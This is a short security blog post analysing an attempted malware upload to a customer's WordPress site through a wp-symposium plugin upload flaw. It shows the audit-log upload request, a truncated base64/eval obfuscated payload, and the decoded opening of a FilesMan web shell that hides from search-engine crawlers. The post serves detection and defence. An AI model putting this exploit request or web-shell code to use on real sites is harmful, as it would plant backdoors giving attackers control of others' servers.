Free Online PHP Obfuscator

by

Free Online PHP Obfuscator is designed to help PHP developers protect their intellectual property. Any time you give your PHP source code to someone else your intellectual property can be used and altered without your permission.

It’s not one-way encryption but it will keep curious eyes away from your code.

These tryed again upload to server’s, here little sample modsecurity audit log:

--e5439532-C--
--13530703071348311
Content-Disposition: form-data; name="uploader_url"

http://www.malware.expert/wp-content/plugins/wp-symposium/server/php/
--13530703071348311
Content-Disposition: form-data; name="uploader_uid"

1
--13530703071348311
Content-Disposition: form-data; name="uploader_dir"

./azNaop
--13530703071348311
Content-Disposition: form-data; name="files[]"; filename="JMnDcBBW.php"
Content-Type: application/octet-stream

<?php
/*
Obfuscation provided by FOPO - Free Online PHP Obfuscator: http://www.fopo.com.ar/
This code was created on Wednesday, May 11th, 2016 at 6:10 UTC from IP 203.66.57.176 (tw)
Checksum: b56f18145b5a1f538c40418a696b900bde0a4b95
*/
$ud4d324d="\142\x61\x73\x65\66\64\137\x64\x65\x63\x6f\144\145";@eval($ud4d324d(
"Ly9OTnJOK1UvOEtBaUFhbnIyRnR3S0lvV3N1eHRsRnlkeFhoTWtPRm1pQ2V6b1gvN1dOZDBOd2E5Ql
lnWTFqNEt4bXZHRFlkdC90Y2Fjc2NMek1vV3ZOLy83dWlDWU84bktpSUErOVhPbDZpODZTSWwyMjBLU
zVFUXZRcjVRZ3NCamtodmw0SUpYRmx0VUNWcG8xb0VZVkcwZHlLUUs4TnF3Y2Y0Ui9JRTlCTTdOVENB
WXVxR3NBOEpkQWtLY1VhelVOM3cwaU9YcDhHYzJMUzd0OHZSZFZvYTNNMTFCaDJJaE9wb2ZLd3A2dUZ
Continues ...

You can decode PHP Obfuscator file here:
http://decode.tools

Also, but not tested:
http://lombokcyber.com/en/detools/decode-fopo
https://github.com/Helioscx/FOPO-Decoder

Again this PHP Obfuscator inside is Filesman backdoor:

?><?php $auth_pass = "866fd58d77526c1bda8771b5b21d5b11"; $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "Bing"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } }

Again malware tryed uploaded to customer website.

References: http://www.fopo.com.ar/

Malware PHP Signatures

Use can use for FREE Malware Expert – Signatures detect malware from PHP files.